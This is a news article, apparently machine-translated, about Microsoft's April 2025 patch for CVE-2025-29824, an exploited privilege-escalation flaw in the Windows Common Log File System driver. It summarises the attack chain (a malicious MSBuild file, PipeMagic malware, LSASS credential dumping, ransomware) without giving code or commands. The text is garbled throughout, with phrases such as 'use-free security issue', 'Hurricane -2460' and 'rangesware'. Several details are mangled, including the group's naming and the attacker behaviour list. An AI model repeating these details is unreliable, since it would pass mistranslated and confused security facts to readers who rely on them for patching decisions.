Microsoft released security updates for Windows yesterday and revealed today that the update included a patch for the 0-day issue that has been exploited in the wild.
Vulnerable – Windows Common Log File System Driver Driver has been tracked as vulnerability of privilege – has been tracked – Cve-2025-29824,
Important Information:
- The problem affects mostly supported servers and client versions of Windows including Windows 10, Windows 11 and Windows Server 2025.
- Microsoft notes that exploitation does not work in Windows 11, version 24h2.
- This is a use-free security issue that can be exploited for local upgradation attacks.
- User interaction is not required for the attack.
- The attacker can gain privilege on successful exploitation.
Microsoft notes that it is aware of limited attacks. It refers to the target in IT and real estate sectors in the United States, financial sector in Venezuela, a Spanish software company and a special announcement in the retail sector in Saudi Arabia. Safety website,
The establishment of the update protects the systems against the exploits. The guidance of Microsoft involves an inauspicious note that suggests that the company is delaying the patch for Windows 10 system. This does not provide an explanation for the delay. The affected users and administrators are asked to monitor the official CVE Microsoft,S msRC Website for updates about the rollout of the patch for Windows 10 System.
Home users can use Windows updates to install the patch immediately on Windows 11. This is done through Settings> Windows updates. Note that a restart of the system is required to finalize the installation of safety updates.
On the technical side, the vulnerability is found in the Common Log File System (CLFS) kernel driver according to Microsoft. The company says that the initial attack has not determined the vector, but has discovered “Some notable pre -exploitation behavior by Hurricane -2460”.
Good for known: Storm 2460, known as RansomexX, is a notorious rangesware group.
Microsoft saw the following behavior in many cases:
- Danger actor a valid but compromise uses a certificate tool to download a malicious file from the third party website.
- The downloaded file was a malicious MSBUILD file.
- The malware in the question is known as the name of Pipemazic, which is known since 2023.
- After the deployment of malware, it is exploiting the vulnerability described in this guide for the process injection in system procedures.
One of the activities of malware on the user system is dumping and passing of LSASS memory to get a user credentials. The ransomware activity followed on target systems, especially to add encryption and random extensions.
Closing word
Efforts to exploit the Microsoft system recommends installing Windows safety patch immediately to protect the system. The delay on Windows 10 is unfortunate, because it means that the system remains unsafe for attacks until the patch for Microsoft system is released.
Now you: When do you install updates on your system? Have you already installed April 2025 Security Update?
Thanks for reading..
